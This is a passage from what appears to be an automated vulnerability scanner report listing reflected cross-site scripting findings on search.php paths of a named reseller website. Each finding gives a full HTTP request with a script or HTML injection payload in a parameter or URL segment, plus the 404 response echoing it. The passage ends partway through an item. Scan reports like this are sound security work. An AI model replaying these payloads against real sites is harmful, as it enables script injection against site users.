GET /detail/31/themes/kosmos/images/rating/search.php?keyword=search...bc061<a>0e47c119038&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/rating/search.php?keyword=search...bc061<a>0e47c119038&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2227. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cc557<script>alert(1)</script>bd88a405c7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&cc557<script>alert(1)</script>bd88a405c7f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&cc557<script>alert(1)</script>bd88a405c7f=1 was not found on this server.</p>
...[SNIP]...

2.2228. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d548f<a>71e461b7185 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2d548f<a>71e461b7185 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2d548f<a>71e461b7185 was not found on this server.</p>
...[SNIP]...

2.2229. http://www.resellerbase.com/detail/31/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e8998<script>alert(1)</script>152334726ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile8998<script>alert(1)</script>152334726ce/31/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile8998<script>alert(1)</script>152334726ce/31/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2230. http://www.resellerbase.com/detail/31/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f9540<script>alert(1)</script>863e21e1eac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31f9540<script>alert(1)</script>863e21e1eac/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31f9540<script>alert(1)</script>863e21e1eac/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2231. http://www.resellerbase.com/detail/31/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ee4ba<script>alert(1)</script>20a2fc60822 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themesee4ba<script>alert(1)</script>20a2fc60822/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themesee4ba<script>alert(1)</script>20a2fc60822/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2232. http://www.resellerbase.com/detail/31/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 73d29<script>alert(1)</script>ae53554de42 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos73d29<script>alert(1)</script>ae53554de42/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos73d29<script>alert(1)</script>ae53554de42/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2233. http://www.resellerbase.com/detail/31/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 12351<script>alert(1)</script>f1019051a3c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images12351<script>alert(1)</script>f1019051a3c/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images12351<script>alert(1)</script>f1019051a3c/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2234. http://www.resellerbase.com/detail/31/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 6a7fd<script>alert(1)</script>c29e4648d1f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images/search.php6a7fd<script>alert(1)</script>c29e4648d1f?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/search.php6a7fd<script>alert(1)</script>c29e4648d1f?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2235. http://www.resellerbase.com/detail/31/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 1ed09<a>58df6b5c5af was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/themes/kosmos/images/search.php?keyword=search...&Submit3=Search1ed09<a>58df6b5c5af&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/search.php?keyword=search...&Submit3=Search1ed09<a>58df6b5c5af&opt=2 was not found on this server.</p>
...[SNIP]...

2.2236. http://www.resellerbase.com/detail/31/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 45991<a>a72438db2ed was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/themes/kosmos/images/search.php?keyword=search...45991<a>a72438db2ed&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/search.php?keyword=search...45991<a>a72438db2ed&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2237. http://www.resellerbase.com/detail/31/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4aabe<script>alert(1)</script>72ba37a4b93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&4aabe<script>alert(1)</script>72ba37a4b93=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&4aabe<script>alert(1)</script>72ba37a4b93=1 was not found on this server.</p>
...[SNIP]...

2.2238. http://www.resellerbase.com/detail/31/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 6002a<a>f20a6e6e27f was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=26002a<a>f20a6e6e27f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=26002a<a>f20a6e6e27f was not found on this server.</p>
...[SNIP]...

2.2239. http://www.resellerbase.com/detail/31/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3afea<script>alert(1)</script>2bddb0a542f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3afea<script>alert(1)</script>2bddb0a542f/31/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3afea<script>alert(1)</script>2bddb0a542f/31/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2240. http://www.resellerbase.com/detail/31/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4be99<script>alert(1)</script>6451323735a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/314be99<script>alert(1)</script>6451323735a/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/314be99<script>alert(1)</script>6451323735a/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2241. http://www.resellerbase.com/detail/31/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9333d<script>alert(1)</script>c19c2b8f676 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes9333d<script>alert(1)</script>c19c2b8f676/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes9333d<script>alert(1)</script>c19c2b8f676/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2242. http://www.resellerbase.com/detail/31/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 32c29<script>alert(1)</script>fa9d1791952 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos32c29<script>alert(1)</script>fa9d1791952/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos32c29<script>alert(1)</script>fa9d1791952/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2243. http://www.resellerbase.com/detail/31/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 23bdd<script>alert(1)</script>03376e03994 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/search.php23bdd<script>alert(1)</script>03376e03994?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/search.php23bdd<script>alert(1)</script>03376e03994?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2244. http://www.resellerbase.com/detail/31/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/search.php

Issue detail

